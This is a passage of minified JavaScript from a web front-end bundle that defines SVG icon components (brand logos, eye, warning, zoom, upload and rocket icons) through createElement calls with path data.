3.966a.25.25 0 0 0-.247-.216H2a.75.75 0 0 1 0-1.5h2.129a1.75 1.75 0 0 1 1.733 1.51l.068.49h14.874a1.75 1.75 0 0 1 1.722 2.06l-1.152 6.403a1.75 1.75 0 0 1-1.572 1.434l-12.36 1.067.182 1.32a.25.25 0 0 0 .247.216H18.5a2.5 2.5 0 0 1 2.5 2.5Z"})),skype_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7.5 1.25a6.25 6.25 0 0 0-5.197 9.723 9.75 9.75 0 0 0 10.724 10.724 6.25 6.25 0 0 0 8.67-8.67A9.75 9.75 0 0 0 10.973 2.303 6.224 6.224 0 0 0 7.5 1.25Zm4.5 6C9.8 7.25 8.25 8.4 8.25 10c0 1.015.647 1.627 1.337 1.991.644.34 1.468.546 2.178.723l.053.014c.778.194 1.429.361 1.894.607.435.23.538.43.538.665 0 .4-.45 1.25-2.25 1.25S9.75 14.4 9.75 14a.75.75 0 0 0-1.5 0c0 1.6 1.55 2.75 3.75 2.75s3.75-1.15 3.75-2.75c0-1.015-.647-1.627-1.337-1.991-.644-.34-1.468-.546-2.178-.723l-.053-.014c-.778-.194-1.429-.361-1.894-.607-.435-.23-.538-.43-.538-.665 0-.4.45-1.25 2.25-1.25s2.25.85 2.25 1.25a.75.75 0 0 0 1.5 0c0-1.6-1.55-2.75-3.75-2.75Z",clipRule:"evenodd"})),smile_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7.5a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm-7.556 6.275a.75.75 0 1 0-1.43.45 5.752 5.752 0 0 0 10.973 0 .75.75 0 1 0-1.431-.45 4.252 4.252 0 0 1-8.112 0Z",clipRule:"evenodd"})),social_community_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.75a3.384 3.384 0 0 1 3.238 2.408C18.858 5.46 21.4 8.895 21.4 13c0 .506-.039 1.002-.113 1.486a3.388 3.388 0 0 1 1.463 2.791 3.386 3.386 0 0 1-4.785 3.085A9.3 9.3 0 0 1 12 22.5a9.302 9.302 0 0 1-5.965-2.138 3.386 3.386 0 0 1-4.785-3.085c0-1.156.579-2.179 1.463-2.79A9.77 9.77 0 0 1 2.6 13c0-4.105 2.543-7.54 6.162-8.841A3.384 3.384 0 0 1 12 1.75ZM19.4 13c0-2.998-1.707-5.533-4.22-6.704A3.383 3.383 0 0 1 12 8.527a3.383 3.383 0 0 1-3.18-2.231C6.307 7.467 4.6 10.002 4.6 13c0 .301.017.598.05.889a3.385 3.385 0 0 1 3.363 3.388c0 .63-.172 1.221-.471 1.727A7.322 7.322 0 0 0 12 20.5a7.321 7.321 0 0 0 4.458-1.495 3.384 3.384 0 0 1-.47-1.728 3.385 3.385 0 0 1 3.361-3.388c.034-.291.05-.588.05-.889Z",clipRule:"evenodd"})),square_rounded_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19V5A2.75 2.75 0 0 1 5 2.25h14A2.75 2.75 0 0 1 21.75 5v14Z"})),star_rating_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M10.3 2.793c.67-1.443 2.73-1.443 3.4 0l2.136 4.602a.294.294 0 0 0 .232.166l5.068.596c1.578.186 2.232 2.136 1.05 3.222l-3.748 3.444a.28.28 0 0 0-.087.261l.995 4.975c.315 1.574-1.369 2.76-2.75 1.99l-4.45-2.474a.3.3 0 0 0-.291 0l-4.45 2.475c-1.382.768-3.065-.417-2.75-1.991l.995-4.975a.28.28 0 0 0-.087-.26l-3.748-3.445c-1.182-1.086-.529-3.036 1.05-3.222l5.067-.596a.293.293 0 0 0 .232-.166L10.3 2.793Z"})),stopwatch_reading_time_timer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15 1.5a1 1 0 0 0-1-1h-4a1 1 0 1 0 0 2h1v.8c-4.915.502-8.75 4.653-8.75 9.7 0 5.385 4.365 9.75 9.75 9.75s9.75-4.365 9.75-9.75c0-5.047-3.835-9.198-8.75-9.7v-.8h1a1 1 0 0 0 1-1Zm-4 6a1 1 0 1 1 2 0v4.985l3.081 2.202.08.063a1 1 0 0 1-1.156 1.62l-.086-.056-3.5-2.5A1 1 0 0 1 11 13V7.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M18.293 3.293a1 1 0 0 1 1.414 0l2 2 .068.076a1 1 0 0 1-1.406 1.406l-.076-.068-2-2a1 1 0 0 1 0-1.414Z"})),tablet_ipad_pad_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M18 22.75A2.75 2.75 0 0 0 20.75 20V4A2.75 2.75 0 0 0 18 1.25H6A2.75 2.75 0 0 0 3.25 4v16A2.75 2.75 0 0 0 6 22.75h12ZM12.01 4a1 1 0 1 1 0 2C11.457 6 11 5.552 11 5s.457-1 1.01-1Z",clipRule:"evenodd"})),tag_bookmark_save_favourite_mark_discount_solid_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M20.75 22a.75.75 0 0 1-1.2.6l-6.8-5.1a1.25 1.25 0 0 0-1.415-.059l-.085.059-6.8 5.1a.75.75 0 0 1-1.2-.6V4A2.75 2.75 0 0 1 6 1.25h12A2.75 2.75 0 0 1 20.75 4v18Z"})),tiktok_logo_icon_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm2.364 5.25a1 1 0 1 0-2 0v7.792a2.195 2.195 0 0 1-2.182 2.208A2.195 2.195 0 0 1 8 14.292c0-1.228.985-2.209 2.182-2.209a1 1 0 1 0 0-2C7.864 10.083 6 11.975 6 14.292c0 2.316 1.864 4.208 4.182 4.208 2.317 0 4.182-1.892 4.182-4.208V9.934a4.74 4.74 0 0 0 2.636.774 1 1 0 1 0 0-2c-1.713 0-2.636-1.377-2.636-2.208Z",clipRule:"evenodd"})),tiktok_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 21.75A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14ZM6 14.292c0-2.316 1.864-4.209 4.182-4.209a1 1 0 0 1 0 2c-1.197 0-2.182.982-2.182 2.209s.985 2.208 2.182 2.208 2.181-.98 2.181-2.208V6.5a1 1 0 0 1 2 0c0 .83.924 2.208 2.637 2.208a1 1 0 0 1 0 2 4.738 4.738 0 0 1-2.637-.776v4.36c0 2.316-1.864 4.208-4.181 4.208C7.864 18.5 6 16.608 6 14.292Z",clipRule:"evenodd"})),triangle_rounded_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632Z",clipRule:"evenodd"})),triangle_shape_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 2.25a.75.75 0 0 1 .646.37l10 17A.75.75 0 0 1 22 20.75H2a.75.75 0 0 1-.646-1.13l10-17A.75.75 0 0 1 12 2.25Z",clipRule:"evenodd"})),twitter_x_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20.292 2.293a1.001 1.001 0 0 1 1.415 1.414l-7.125 7.124 7.026 9.73A.751.751 0 0 1 21 21.75h-5a.751.751 0 0 1-.608-.311l-4.789-6.63-6.896 6.897a1 1 0 0 1-1.414-1.415l7.124-7.125L2.392 3.44A.751.751 0 0 1 3 2.25h5l.09.005a.751.751 0 0 1 .518.306l4.787 6.628 6.897-6.896Z",clipRule:"evenodd"})),upload_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.47 12.47a.75.75 0 0 1 1.06 0l2.5 2.5a.75.75 0 0 1-.53 1.28h-1.75V21a.75.75 0 0 1-1.5 0v-4.75H9.5a.75.75 0 0 1-.53-1.28l2.5-2.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m23.67 11.663-.015-.03-.032-.06-.007-.013a18.339 18.339 0 0 0-.72-1.217 20.43 20.43 0 0 0-2.224-2.856C18.733 5.42 15.799 3.25 12 3.25c-3.8 0-6.734 2.17-8.672 4.237a20.43 20.43 0 0 0-2.796 3.801 11.69 11.69 0 0 0-.149.272l-.007.014-.032.06-.015.03a.76.76 0 0 0 0 .673l.015.03.032.06.007.013a18.262 18.262 0 0 0 .72 1.217 20.432 20.432 0 0 0 2.225 2.856C5.266 18.58 8.2 20.75 12 20.75c3.8 0 6.733-2.17 8.672-4.237a20.433 20.433 0 0 0 2.795-3.801c.065-.115.115-.208.149-.272l.007-.013.02-.037.012-.024.015-.03a.756.756 0 0 0 0-.673ZM12 5.75a4.25 4.25 0 1 1 0 8.5 4.25 4.25 0 0 1 0-8.5Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m.33 11.664.015-.03.032-.06.007-.014a18.263 18.263 0 0 1 .72-1.217 20.43 20.43 0 0 1 2.224-2.856C5.268 5.42 8.201 3.25 12 3.25c3.8 0 6.734 2.17 8.672 4.237a20.425 20.425 0 0 1 2.796 3.801c.065.115.115.208.149.272l.007.014.032.06.014.03a.75.75 0 0 1 .001.672l-.015.03a5.739 5.739 0 0 1-.032.06l-.007.014a18.252 18.252 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.225 2.856C18.734 18.58 15.8 20.75 12 20.75c-3.8 0-6.733-2.17-8.671-4.237a20.432 20.432 0 0 1-2.796-3.801 12.06 12.06 0 0 1-.149-.272l-.007-.013-.032-.06-.015-.03a.756.756 0 0 1 0-.673ZM15.75 12a3.75 3.75 0 1 1-7.5 0 3.75 3.75 0 0 1 7.5 0Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M23.616 11.573C20.503 7.077 16.29 4.75 12 4.75c-4.291 0-8.504 2.327-11.617 6.823a.75.75 0 0 0 0 .854C3.496 16.922 7.71 19.25 12 19.25c4.29 0 8.503-2.328 11.616-6.823a.75.75 0 0 0 0-.854ZM17.25 12a5.25 5.25 0 1 0-10.5 0 5.25 5.25 0 0 0 10.5 0Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M14.25 12A2.25 2.25 0 0 0 12 9.75a.75.75 0 0 1 0-1.5A3.75 3.75 0 0 1 15.75 12a.75.75 0 0 1-1.5 0Z"})),view_count_show_visible_eye_open_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M14.25 10a1.75 1.75 0 0 0 3.366.673l.049-.098a.751.751 0 0 1 1.318.06 7.75 7.75 0 1 1-3.62-3.62.75.75 0 0 1-.036 1.369A1.751 1.751 0 0 0 14.25 10Z"}),(0,a.createElement)("path",{d:"M12 2c4.335 0 8.706 2.263 10.89 6.546a1 1 0 1 1-1.78.908C19.301 5.911 15.664 4 12 4 8.335 4 4.698 5.911 2.89 9.454a1 1 0 0 1-1.78-.908C3.293 4.263 7.664 2 12 2Z"})),view_count_show_visible_eye_open_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 12H12V7.25A4.75 4.75 0 1 0 16.75 12Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"m23.167 12.083.727.364c.141-.281.14-.613 0-.895l-.002-.003-.003-.007-.011-.022a10.615 10.615 0 0 0-.192-.354 20.675 20.675 0 0 0-2.831-3.85C18.895 5.226 15.899 3 12 3 8.1 3 5.104 5.226 3.145 7.316a20.674 20.674 0 0 0-2.831 3.85 12.375 12.375 0 0 0-.192.354l-.011.022-.003.007-.002.002s0 .002.894.449l-.894-.447a1 1 0 0 0 0 .894l.002.004.003.007.011.022a8.267 8.267 0 0 0 .192.354 20.67 20.67 0 0 0 2.831 3.85C5.105 18.774 8.1 21 12 21c3.9 0 6.895-2.226 8.855-4.316a20.672 20.672 0 0 0 2.831-3.85 11.81 11.81 0 0 0 .175-.322l.017-.032.011-.022.003-.007.002-.002s0-.002-.727-.366Zm-.096-.119.823-.412-.823.412ZM12 5a7 7 0 1 0 0 14 7 7 0 0 0 0-14Z",clipRule:"evenodd"})),warning_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM13 8a1 1 0 1 0-2 0v4a1 1 0 1 0 2 0V8Zm-1 6.75a1.25 1.25 0 1 0 0 2.5 1.25 1.25 0 0 0 0-2.5Z",clipRule:"evenodd"})),warning_triangle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632ZM11 9v4a1 1 0 1 0 2 0V9a1 1 0 1 0-2 0Zm0 7.5v.5a1 1 0 1 0 2 0v-.5a1 1 0 1 0-2 0Z",clipRule:"evenodd"})),whatsapp_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12c0 1.802.444 3.501 1.228 4.994l-1.206 4.824a.75.75 0 0 0 .91.91l4.824-1.206A10.706 10.706 0 0 0 12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25Zm3.16 12.04c.245.09 1.56.733 1.828.866v.001l.145.071c.187.09.313.151.367.24.067.111.067.645-.156 1.266-.223.622-1.292 1.19-1.805 1.266-.461.069-1.044.097-1.685-.106a15.383 15.383 0 0 1-1.525-.56c-2.506-1.078-4.2-3.495-4.522-3.954l-.047-.066-.002-.002c-.14-.186-1.09-1.447-1.09-2.752 0-1.226.605-1.87.883-2.165l.053-.056a.984.984 0 0 1 .713-.333c.179 0 .357.002.513.01h.06c.156 0 .35-.001.541.456.078.185.193.463.313.753.225.547.469 1.137.512 1.224.067.133.112.288.022.466l-.039.08a1.49 1.49 0 0 1-.228.364l-.14.166c-.09.111-.182.222-.261.3-.134.133-.273.277-.117.544.156.266.692 1.138 1.488 1.844a6.905 6.905 0 0 0 1.973 1.241c.074.032.134.058.178.08.267.133.423.111.58-.067.155-.177.668-.777.846-1.043.178-.267.357-.223.602-.134Z",clipRule:"evenodd"})),wordpress_logo_icon_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2.778 12a9.225 9.225 0 0 0 5.198 8.3l-4.4-12.054A9.18 9.18 0 0 0 2.779 12Zm15.447-.465c0-1.139-.409-1.929-.76-2.543-.466-.76-.905-1.402-.905-2.162 0-.847.642-1.637 1.548-1.637.04 0 .079.005.119.007A9.185 9.185 0 0 0 12 2.778a9.21 9.21 0 0 0-7.705 4.158c.216.007.421.01.593.01.965 0 2.458-.117 2.458-.117.497-.03.557.7.06.76 0 0-.5.057-1.055.087l3.359 9.988 2.018-6.052-1.437-3.936c-.497-.03-.967-.088-.967-.088-.497-.03-.439-.79.058-.76 0 0 1.523.118 2.428.118.965 0 2.458-.117 2.458-.117.497-.03.557.7.06.76 0 0-.5.057-1.054.087l3.332 9.913.92-3.074c.398-1.276.701-2.192.701-2.982l-.002.002Z"}),(0,a.createElement)("path",{d:"m12.16 12.807-2.766 8.04a9.25 9.25 0 0 0 5.667-.147.719.719 0 0 1-.065-.126l-2.835-7.767Zm7.931-5.231c.04.293.062.61.062.948 0 .935-.176 1.988-.702 3.302l-2.816 8.145a9.22 9.22 0 0 0 4.585-7.973 9.157 9.157 0 0 0-1.13-4.424l.002.002Z"}),(0,a.createElement)("path",{d:"M12 1.25C6.071 1.25 1.25 6.072 1.25 12S6.072 22.75 12 22.75c5.926 0 10.748-4.822 10.748-10.75C22.75 6.072 17.926 1.25 12 1.25Zm0 21.007c-5.656 0-10.257-4.601-10.257-10.259 0-5.657 4.6-10.255 10.256-10.255 5.655 0 10.256 4.601 10.256 10.257S17.655 22.259 12 22.259v-.002Z"})),wordpress_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 1.25C6.075 1.25 1.25 6.074 1.25 12c0 5.928 4.824 10.75 10.75 10.75 5.928 0 10.75-4.822 10.75-10.75 0-5.926-4.822-10.75-10.75-10.75ZM2.336 12c0-1.4.302-2.732.837-3.933l4.61 12.63a9.665 9.665 0 0 1-5.447-8.696Zm9.666 9.665a9.629 9.629 0 0 1-2.731-.394l2.9-8.426 2.97 8.14c.02.047.044.091.07.132a9.655 9.655 0 0 1-3.21.548Zm1.33-14.195a19.275 19.275 0 0 0 1.106-.094c.522-.06.46-.826-.061-.795 0 0-1.565.122-2.577.122-.949 0-2.545-.122-2.545-.122-.52-.03-.583.765-.06.795 0 0 .492.062 1.013.094l1.506 4.125-2.117 6.342L6.08 7.47a20.357 20.357 0 0 0 1.106-.092c.52-.063.46-.828-.063-.797 0 0-1.563.122-2.575.122-.182 0-.395-.004-.621-.011A9.651 9.651 0 0 1 12 2.335a9.63 9.63 0 0 1 6.527 2.538c-.043-.002-.083-.007-.127-.007-.95 0-1.622.825-1.622 1.715 0 .795.46 1.47.949 2.266.367.644.796 1.471.796 2.665 0 .827-.316 1.787-.736 3.124l-.963 3.222L13.332 7.47Zm3.528 12.884 2.951-8.535c.552-1.38.734-2.481.734-3.461 0-.357-.022-.686-.064-.995A9.608 9.608 0 0 1 21.665 12a9.661 9.661 0 0 1-4.805 8.353Z"})),youtube_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19.29 3.608c-3.693-.479-10.531-.477-14.402.003-1.874.233-3.194 1.843-3.41 3.831-.304 2.773-.304 6.343 0 9.116.216 1.988 1.536 3.598 3.41 3.83 3.87.481 10.71.483 14.401.004 1.784-.232 2.995-1.77 3.21-3.63.334-2.868.334-6.656 0-9.524-.215-1.86-1.426-3.398-3.21-3.63Zm-8.904 4.749A.75.75 0 0 0 9.25 9v6a.75.75 0 0 0 1.136.643l5-3a.75.75 0 0 0 0-1.286l-5-3Z",clipRule:"evenodd"})),full_screen_corners_out_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M2 8.5V5C2 3.34315 3.34315 2 5 2H8.5C9.05228 2 9.5 2.44772 9.5 3C9.5 3.55228 9.05228 4 8.5 4H5C4.44772 4 4 4.44772 4 5V8.5C4 9.05228 3.55228 9.5 3 9.5C2.44772 9.5 2 9.05228 2 8.5Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M2 19V15.5C2 14.9477 2.44772 14.5 3 14.5C3.55228 14.5 4 14.9477 4 15.5V19C4 19.5523 4.44772 20 5 20H8.5C9.05228 20 9.5 20.4477 9.5 21C9.5 21.5523 9.05228 22 8.5 22H5C3.34315 22 2 20.6569 2 19Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M20 8V5C20 4.44772 19.5523 4 19 4H15.5C14.9477 4 14.5 3.55228 14.5 3C14.5 2.44772 14.9477 2 15.5 2H19C20.6569 2 22 3.34315 22 5V8C22 8.55228 21.5523 9 21 9C20.4477 9 20 8.55228 20 8Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M20 19V15.5C20 14.9477 20.4477 14.5 21 14.5C21.5523 14.5 22 14.9477 22 15.5V19C22 20.6569 20.6569 22 19 22H15.5C14.9477 22 14.5 21.5523 14.5 21C14.5 20.4477 14.9477 20 15.5 20H19C19.5523 20 20 19.5523 20 19Z",fill:"currentColor"})),zoom_in_magnifying_glass_plus_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11 2C15.9706 2 20 6.02944 20 11C20 13.125 19.2619 15.0766 18.0303 16.6162L21.707 20.293C22.0972 20.6835 22.0974 21.3166 21.707 21.707C21.3166 22.0974 20.6835 22.0972 20.293 21.707L16.6162 18.0303C15.0766 19.2619 13.125 20 11 20C6.02944 20 2 15.9706 2 11C2 6.02944 6.02944 2 11 2ZM11 4C7.13401 4 4 7.13401 4 11C4 14.866 7.13401 18 11 18C12.89 18 14.6038 17.2497 15.8633 16.0322C15.8877 16.0012 15.9148 15.9719 15.9434 15.9434C15.9719 15.9148 16.0012 15.8877 16.0322 15.8633C17.2497 14.6038 18 12.89 18 11C18 7.13401 14.866 4 11 4Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M9.99512 14V12.0049H8C7.44772 12.0049 7 11.5572 7 11.0049C7.00007 10.4527 7.44776 10.0049 8 10.0049H9.99512V8C9.99512 7.44772 10.4428 7 10.9951 7C11.5473 7.00007 11.9951 7.44776 11.9951 8V10.0049H14C14.5522 10.0049 14.9999 10.4527 15 11.0049C15 11.5572 14.5523 12.0049 14 12.0049H11.9951V14C11.9951 14.5522 11.5473 14.9999 10.9951 15C10.4428 15 9.99512 14.5523 9.99512 14Z",fill:"currentColor"})),zoom_out_magnifying_glass_minus_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11 2C15.9706 2 20 6.02944 20 11C20 13.125 19.2619 15.0766 18.0303 16.6162L21.707 20.293C22.0972 20.6835 22.0974 21.3166 21.707 21.707C21.3166 22.0974 20.6835 22.0972 20.293 21.707L16.6162 18.0303C15.0766 19.2619 13.125 20 11 20C6.02944 20 2 15.9706 2 11C2 6.02944 6.02944 2 11 2ZM11 4C7.13401 4 4 7.13401 4 11C4 14.866 7.13401 18 11 18C12.89 18 14.6038 17.2497 15.8633 16.0322C15.8877 16.0012 15.9148 15.9719 15.9434 15.9434C15.9719 15.9148 16.0012 15.8877 16.0322 15.8633C17.2497 14.6038 18 12.89 18 11C18 7.13401 14.866 4 11 4Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M14 10.005C14.5523 10.005 15 10.4527 15 11.005C15 11.5573 14.5523 12.005 14 12.005H8C7.44772 12.005 7 11.5573 7 11.005C7 10.4527 7.44772 10.005 8 10.005H14Z",fill:"currentColor"})),gallery_indicator_image_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M16.75 7C16.75 8.10457 15.8546 9 14.75 9C13.6454 9 12.75 8.10457 12.75 7C12.75 5.89543 13.6454 5 14.75 5C15.8546 5 16.75 5.89543 16.75 7Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M6.5 18.5C6.5 18.3619 6.38807 18.25 6.25 18.25H4C3.86193 18.25 3.75 18.3619 3.75 18.5V20C3.75 20.1381 3.86193 20.25 4 20.25H6.25C6.38807 20.25 6.5 20.1381 6.5 20V18.5ZM8 20C8 20.9665 7.2165 21.75 6.25 21.75H4C3.0335 21.75 2.25 20.9665 2.25 20V18.5C2.25 17.5335 3.0335 16.75 4 16.75H6.25C7.2165 16.75 8 17.5335 8 18.5V20Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M13.5 18.5C13.5 18.3619 13.3881 18.25 13.25 18.25H11C10.8619 18.25 10.75 18.3619 10.75 18.5V20C10.75 20.1381 10.8619 20.25 11 20.25H13.25C13.3881 20.25 13.5 20.1381 13.5 20V18.5ZM15 20C15 20.9665 14.2165 21.75 13.25 21.75H11C10.0335 21.75 9.25 20.9665 9.25 20V18.5C9.25 17.5335 10.0335 16.75 11 16.75H13.25C14.2165 16.75 15 17.5335 15 18.5V20Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M20.25 18.5C20.25 18.3619 20.1381 18.25 20 18.25H18C17.8619 18.25 17.75 18.3619 17.75 18.5V20C17.75 20.1381 17.8619 20.25 18 20.25H20C20.1381 20.25 20.25 20.1381 20.25 20V18.5ZM21.75 20C21.75 20.9665 20.9665 21.75 20 21.75H18C17.0335 21.75 16.25 20.9665 16.25 20V18.5C16.25 17.5335 17.0335 16.75 18 16.75H20C20.9665 16.75 21.75 17.5335 21.75 18.5V20Z",fill:"currentColor"}),(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M19 15.75C20.5188 15.75 21.75 14.5188 21.75 13V5C21.75 3.4812 20.5188 2.25 19 2.25H5C3.4812 2.25 2.25 3.4812 2.25 5V13C2.25 14.5188 3.4812 15.75 5 15.75H19ZM3.75 11.8613V5C3.75 4.30957 4.30963 3.75 5 3.75H19C19.6904 3.75 20.25 4.30957 20.25 5V10.8613L19.9442 10.5557C18.8703 9.48169 17.1295 9.48169 16.0555 10.5557L15.3837 11.2266C14.8956 11.7146 14.1042 11.7146 13.6161 11.2266L10.9442 8.55566C9.8703 7.48169 8.12946 7.48169 7.05554 8.55566L3.75 11.8613Z",fill:"currentColor"})),rocket_fly_boost_launch_pro_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M7.79289 14.7929C8.18342 14.4024 8.81643 14.4024 9.20696 14.7929C9.59748 15.1834 9.59748 15.8164 9.20696 16.207L4.20696 21.207C3.81643 21.5975 3.18342 21.5975 2.79289 21.207C2.40237 20.8164 2.40237 20.1834 2.79289 19.7929L7.79289 14.7929Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M10.2929 17.2929C10.6834 16.9024 11.3164 16.9024 11.707 17.2929C12.0975 17.6834 12.0975 18.3164 11.707 18.707L9.70696 20.707C9.31643 21.0975 8.68342 21.0975 8.29289 20.707C7.90237 20.3164 7.90237 19.6834 8.29289 